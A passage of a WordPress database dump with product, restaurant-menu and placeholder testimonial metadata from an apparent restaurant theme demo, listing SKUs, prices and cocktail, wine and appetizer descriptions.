s:10:\"vc_grid_id\";a:0:{}}'),(27652,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27653,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27654,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27655,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27656,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27657,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27658,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27659,528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27660,528,'mkdf_show_new_sign_woo_meta','no'),(27661,528,'slide_template','default'),(27662,528,'_wpb_vc_js_status','false'),(27663,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27664,530,'_sku','PR0035'),(27665,530,'_regular_price','50'),(27666,530,'_sale_price',''),(27667,530,'_sale_price_dates_from',''),(27668,530,'_sale_price_dates_to',''),(27669,530,'total_sales','0'),(27670,530,'_tax_status','taxable'),(27671,530,'_tax_class',''),(27672,530,'_manage_stock','no'),(27673,530,'_backorders','no'),(27674,530,'_sold_individually','no'),(27675,530,'_weight','150'),(27676,530,'_length',''),(27677,530,'_width',''),(27678,530,'_height',''),(27679,530,'_upsell_ids','a:0:{}'),(27680,530,'_crosssell_ids','a:0:{}'),(27681,530,'_purchase_note',''),(27682,530,'_default_attributes','a:0:{}'),(27683,530,'_virtual','no'),(27684,530,'_downloadable','no'),(27685,530,'_product_image_gallery',''),(27686,530,'_download_limit','-1'),(27687,530,'_download_expiry','-1'),(27688,530,'_thumbnail_id','521'),(27689,530,'_stock',''),(27690,530,'_stock_status','instock'),(27691,530,'_wc_average_rating','5.00'),(27692,530,'_wc_rating_count','a:1:{i:5;i:1;}'),(27693,530,'_wc_review_count','0'),(27694,530,'_downloadable_files','a:0:{}'),(27695,530,'_product_attributes','a:0:{}'),(27696,530,'_product_version','4.7.1'),(27697,530,'_price','50'),(27698,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27699,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27700,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27701,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27702,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27703,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27704,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27705,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27706,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27707,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27708,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27709,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27710,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27711,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27712,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27713,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27714,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27715,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27716,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27717,530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27718,530,'mkdf_show_new_sign_woo_meta','no'),(27719,530,'slide_template',''),(27720,530,'_wpb_vc_js_status','false'),(27721,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27722,3123,'_sku','PR0036'),(27723,3123,'_regular_price','100'),(27724,3123,'_sale_price',''),(27725,3123,'_sale_price_dates_from',''),(27726,3123,'_sale_price_dates_to',''),(27727,3123,'total_sales','0'),(27728,3123,'_tax_status','taxable'),(27729,3123,'_tax_class',''),(27730,3123,'_manage_stock','no'),(27731,3123,'_backorders','no'),(27732,3123,'_sold_individually','no'),(27733,3123,'_weight','100'),(27734,3123,'_length',''),(27735,3123,'_width',''),(27736,3123,'_height',''),(27737,3123,'_upsell_ids','a:0:{}'),(27738,3123,'_crosssell_ids','a:0:{}'),(27739,3123,'_purchase_note',''),(27740,3123,'_default_attributes','a:0:{}'),(27741,3123,'_virtual','no'),(27742,3123,'_downloadable','no'),(27743,3123,'_product_image_gallery',''),(27744,3123,'_download_limit','-1'),(27745,3123,'_download_expiry','-1'),(27746,3123,'_thumbnail_id','519'),(27747,3123,'_stock',''),(27748,3123,'_stock_status','outofstock'),(27749,3123,'_wc_average_rating','5.00'),(27750,3123,'_wc_rating_count','a:1:{i:5;i:1;}'),(27751,3123,'_wc_review_count','0'),(27752,3123,'_downloadable_files','a:0:{}'),(27753,3123,'_product_attributes','a:0:{}'),(27754,3123,'_product_version','4.7.1'),(27755,3123,'_price','100'),(27756,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27757,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27758,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27759,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27760,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27761,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27762,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27763,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27764,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27765,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27766,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27767,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27768,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27769,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27770,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27771,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27772,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27773,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27774,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27775,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27776,3123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27777,3123,'mkdf_show_new_sign_woo_meta','no'),(27778,3123,'slide_template','default'),(27779,3123,'_wpb_vc_js_status','false'),(27780,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27781,3124,'_sku','PR0037'),(27782,3124,'_regular_price','120'),(27783,3124,'_sale_price',''),(27784,3124,'_sale_price_dates_from',''),(27785,3124,'_sale_price_dates_to',''),(27786,3124,'total_sales','0'),(27787,3124,'_tax_status','taxable'),(27788,3124,'_tax_class',''),(27789,3124,'_manage_stock','no'),(27790,3124,'_backorders','no'),(27791,3124,'_sold_individually','no'),(27792,3124,'_weight','150'),(27793,3124,'_length',''),(27794,3124,'_width',''),(27795,3124,'_height',''),(27796,3124,'_upsell_ids','a:0:{}'),(27797,3124,'_crosssell_ids','a:0:{}'),(27798,3124,'_purchase_note',''),(27799,3124,'_default_attributes','a:0:{}'),(27800,3124,'_virtual','no'),(27801,3124,'_downloadable','no'),(27802,3124,'_product_image_gallery',''),(27803,3124,'_download_limit','-1'),(27804,3124,'_download_expiry','-1'),(27805,3124,'_thumbnail_id','518'),(27806,3124,'_stock',''),(27807,3124,'_stock_status','instock'),(27808,3124,'_wc_average_rating','5.00'),(27809,3124,'_wc_rating_count','a:1:{i:5;i:1;}'),(27810,3124,'_wc_review_count','0'),(27811,3124,'_downloadable_files','a:0:{}'),(27812,3124,'_product_attributes','a:0:{}'),(27813,3124,'_product_version','4.7.1'),(27814,3124,'_price','120'),(27815,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27816,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27817,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27818,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27819,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27820,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27821,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27822,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27823,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27824,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27825,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27826,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27827,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27828,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27829,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27830,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27831,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27832,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27833,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27834,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27835,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27836,3124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27837,3124,'mkdf_show_new_sign_woo_meta','yes'),(27838,3124,'slide_template','default'),(27839,3124,'_wpb_vc_js_status','false'),(27840,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27841,3125,'_sku','PR0038'),(27842,3125,'_regular_price','185'),(27843,3125,'_sale_price','120'),(27844,3125,'_sale_price_dates_from',''),(27845,3125,'_sale_price_dates_to',''),(27846,3125,'total_sales','0'),(27847,3125,'_tax_status','taxable'),(27848,3125,'_tax_class',''),(27849,3125,'_manage_stock','no'),(27850,3125,'_backorders','no'),(27851,3125,'_sold_individually','no'),(27852,3125,'_weight','185'),(27853,3125,'_length',''),(27854,3125,'_width',''),(27855,3125,'_height',''),(27856,3125,'_upsell_ids','a:0:{}'),(27857,3125,'_crosssell_ids','a:0:{}'),(27858,3125,'_purchase_note',''),(27859,3125,'_default_attributes','a:0:{}'),(27860,3125,'_virtual','no'),(27861,3125,'_downloadable','no'),(27862,3125,'_product_image_gallery',''),(27863,3125,'_download_limit','-1'),(27864,3125,'_download_expiry','-1'),(27865,3125,'_thumbnail_id','535'),(27866,3125,'_stock',''),(27867,3125,'_stock_status','instock'),(27868,3125,'_wc_average_rating','3.50'),(27869,3125,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(27870,3125,'_wc_review_count','0'),(27871,3125,'_downloadable_files','a:0:{}'),(27872,3125,'_product_attributes','a:0:{}'),(27873,3125,'_product_version','4.7.1'),(27874,3125,'_price','120'),(27875,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27876,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27877,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27878,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27879,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27880,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27881,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27882,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27883,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27884,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27885,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27886,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27887,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27888,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27889,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27890,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27891,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27892,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27893,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27894,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27895,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27896,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27897,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27898,3125,'mkdf_show_new_sign_woo_meta','no'),(27899,3125,'slide_template','default'),(27900,3125,'_wpb_vc_js_status','false'),(27901,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27902,3126,'_sku','PR0039'),(27903,3126,'_regular_price','200'),(27904,3126,'_sale_price',''),(27905,3126,'_sale_price_dates_from',''),(27906,3126,'_sale_price_dates_to',''),(27907,3126,'total_sales','0'),(27908,3126,'_tax_status','taxable'),(27909,3126,'_tax_class',''),(27910,3126,'_manage_stock','no'),(27911,3126,'_backorders','no'),(27912,3126,'_sold_individually','no'),(27913,3126,'_weight','185'),(27914,3126,'_length',''),(27915,3126,'_width',''),(27916,3126,'_height',''),(27917,3126,'_upsell_ids','a:0:{}'),(27918,3126,'_crosssell_ids','a:0:{}'),(27919,3126,'_purchase_note',''),(27920,3126,'_default_attributes','a:0:{}'),(27921,3126,'_virtual','no'),(27922,3126,'_downloadable','no'),(27923,3126,'_product_image_gallery',''),(27924,3126,'_download_limit','-1'),(27925,3126,'_download_expiry','-1'),(27927,3126,'_stock',''),(27928,3126,'_stock_status','instock'),(27929,3126,'_wc_average_rating','0'),(27930,3126,'_wc_rating_count','a:0:{}'),(27931,3126,'_wc_review_count','0'),(27932,3126,'_downloadable_files','a:0:{}'),(27933,3126,'_product_attributes','a:0:{}'),(27934,3126,'_product_version','3.4.3'),(27935,3126,'_price','200'),(27936,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27937,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27938,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27939,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27940,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27941,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27942,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27943,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27944,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27945,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27946,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27947,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27948,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27949,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27950,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27951,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27952,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27953,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27954,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27955,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27956,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27957,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27958,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27959,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27960,3126,'mkdf_show_new_sign_woo_meta','no'),(27961,3126,'slide_template','default'),(27962,3126,'_wpb_vc_js_status','false'),(27963,3127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27964,3127,'restaurant_menu_item_price','20'),(27965,3127,'restaurant_menu_item_description','Rye, genever, demerara, and green chartreuse'),(27966,3127,'slide_template','default'),(27967,3127,'restaurant_menu_item_label','1'),(27968,3128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27969,3128,'restaurant_menu_item_price','30$'),(27970,3128,'restaurant_menu_item_description','Scotch, cranberry grenadine, lemon, and gilka kummel'),(27971,3128,'restaurant_menu_item_label','2'),(27972,3128,'slide_template','default'),(27973,3129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27974,3129,'restaurant_menu_item_price','26$'),(27975,3129,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(27976,3129,'restaurant_menu_item_label','3'),(27977,3129,'slide_template','default'),(27978,3130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27979,3130,'restaurant_menu_item_price','50$'),(27980,3130,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(27981,3130,'slide_template','default'),(27982,3131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27983,3131,'restaurant_menu_item_price','15$'),(27984,3131,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(27985,3131,'slide_template','default'),(27986,3132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27987,3132,'restaurant_menu_item_price','10$'),(27988,3132,'restaurant_menu_item_description','Sweet vermouth, amaro lucano, and saline'),(27989,3132,'slide_template','default'),(27990,3133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27991,3133,'restaurant_menu_item_price','30$'),(27992,3133,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(27993,3133,'slide_template','default'),(27994,3134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27995,3134,'restaurant_menu_item_price','35$'),(27996,3134,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(27997,3134,'slide_template','default'),(27998,3135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27999,3135,'restaurant_menu_item_price','50$'),(28000,3135,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(28001,3135,'slide_template','default'),(28002,3136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28003,3136,'restaurant_menu_item_price','20$'),(28004,3136,'restaurant_menu_item_description','France (Provence) Cinsault, Grenache France (Provence) Cinsault, Grenache'),(28005,3136,'slide_template','default'),(28006,3137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28007,3137,'restaurant_menu_item_price','50$'),(28008,3137,'restaurant_menu_item_description','France (Loire) Sauvignon Blanc France (Loire) Sauvignon Blanc'),(28009,3137,'slide_template','default'),(28010,3138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28011,3138,'restaurant_menu_item_price','70$'),(28012,3138,'restaurant_menu_item_description','Portugal (Douro) Rabigato, Codéga de LarinhoFrance (Provence) Cinsault'),(28013,3138,'slide_template','default'),(28014,3139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28015,3139,'restaurant_menu_item_price','30$'),(28016,3139,'restaurant_menu_item_description','France (Burgundy) Chardonnay'),(28017,3139,'slide_template','default'),(28018,3140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28019,3140,'restaurant_menu_item_price','20$'),(28020,3140,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(28021,3140,'slide_template','default'),(28022,3141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28023,3141,'restaurant_menu_item_price','70$'),(28024,3141,'restaurant_menu_item_description','France (Provence) Cinsault'),(28025,3141,'slide_template','default'),(28026,3142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28027,3142,'restaurant_menu_item_price','20$'),(28028,3142,'restaurant_menu_item_description','France (Loire)'),(28029,3142,'slide_template','default'),(28030,3143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28031,3143,'restaurant_menu_item_price','80$'),(28032,3143,'restaurant_menu_item_description','Portugal (Douro) Rabigato'),(28033,3143,'slide_template','default'),(28034,3144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28035,3144,'restaurant_menu_item_price','50$'),(28036,3144,'restaurant_menu_item_description','Ground cumin, avocados, peeled and cubed'),(28037,3144,'slide_template','default'),(28038,3145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28039,3145,'restaurant_menu_item_price','30$'),(28040,3145,'restaurant_menu_item_description','Fresh goat cheese, garlic cloves, minced'),(28041,3145,'slide_template','default'),(28042,3146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28043,3146,'restaurant_menu_item_price','70$'),(28044,3146,'restaurant_menu_item_description','Garbanzo beans or chickpeas, rinsed and drained'),(28045,3146,'slide_template','default'),(28046,3147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28047,3147,'restaurant_menu_item_price','50$'),(28048,3147,'restaurant_menu_item_description','Marinated artichoke hearts'),(28049,3147,'slide_template','default'),(28050,3148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28051,3148,'restaurant_menu_item_price','30$'),(28052,3148,'restaurant_menu_item_description','Spreadable cream cheese, crumbled blue cheese'),(28053,3148,'slide_template','default'),(28054,3149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28055,3149,'restaurant_menu_item_price','20$'),(28056,3149,'restaurant_menu_item_description','French bread baguette, cooked ham, potato salad'),(28057,3149,'slide_template','default'),(28058,3150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28059,3150,'restaurant_menu_item_price','10$'),(28060,3150,'restaurant_menu_item_description','Cream cheese, softened, butter, brown sugar'),(28061,3150,'slide_template','default'),(28062,3151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28063,3151,'restaurant_menu_item_price','30$'),(28064,3151,'restaurant_menu_item_description','Cherry-size fresh mozzarella cheese balls'),(28065,3151,'slide_template','default'),(28066,1346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28067,1346,'restaurant_menu_item_price','50$'),(28068,1346,'restaurant_menu_item_description','Hummus, Greek olives, feta cheese'),(28069,1346,'slide_template','default'),(28070,3152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28071,3152,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28072,3152,'mkdf_testimonial_author','anthony johnston'),(28073,3152,'mkdf_testimonial_author_position','guest'),(28074,3152,'slide_template','default'),(28075,3153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28076,3153,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28077,3153,'mkdf_testimonial_author','Ruby Anderson'),(28078,3153,'mkdf_testimonial_author_position','guest'),(28079,3153,'slide_template','default'),(28080,603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28081,603,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(28082,603,'mkdf_testimonial_author','Isabella Lee'),(28083,603,'mkdf_testimonial_author_position','guest'),(28084,603,'slide_template','default'),(28085,1348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28086,1348,'restaurant_menu_item_price','8$'),(28087,1348,'restaurant_menu_item_description','Corona, Corona Light, Modelo Light & Modelo Especial'),(28088,1348,'slide_template','default'),(28089,1349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28090,1349,'restaurant_menu_item_price','9$'),(28091,1349,'restaurant_menu_item_description','Budweiser or Bud Light. Florida only.'),(28092,1349,'slide_template','default'),(28093,1350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28094,1350,'restaurant_menu_item_price','120$'),(28095,1350,'restaurant_menu_item_description','Argentina'),(28096,1350,'slide_template','default'),(28097,1351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28098,1351,'restaurant_menu_item_price','150$'),(28099,1351,'restaurant_menu_item_description','WA'),(28100,1351,'slide_template','default'),(28101,1352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28102,1352,'restaurant_menu_item_price','170$'),(28103,1352,'restaurant_menu_item_description','Stag\'s Leap Wine Cellars, Napa Valley'),(28104,1352,'slide_template','default'),(28105,1353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28106,1353,'restaurant_menu_item_price','120$'),(28107,1353,'restaurant_menu_item_description','Cavit, Italy'),(28108,1353,'slide_template','default'),(28109,1354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28110,1354,'restaurant_menu_item_price','70$'),(28111,1354,'restaurant_menu_item_description','Chateau Ste. Michelle, WA'),(28112,1354,'slide_template','default'),(28113,1355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28114,1355,'restaurant_menu_item_price','20$'),(28115,1355,'restaurant_menu_item_description','Pusser\'s Rum & orange juice with a touch of pina colada mix.'),(28116,1355,'slide_template','default'),(28117,1356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28118,1356,'restaurant_menu_item_price','12$'),(28119,1356,'restaurant_menu_item_description','Grey Goose Vodka, fresh squeezed lime juice'),(28120,1356,'slide_template','default'),(28121,1357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28122,1357,'restaurant_menu_item_price','15$'),(28123,1357,'restaurant_menu_item_description','Fireball Cinnamon Whisky & RumChata.'),(28124,1357,'slide_template','default'),(28125,1358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(28126,1358,'restaurant_menu_item_price','9$'),(28127,1358,'restaurant_menu_item_description','Cruzan Single Barrel Rum, blackberry, banana and berry 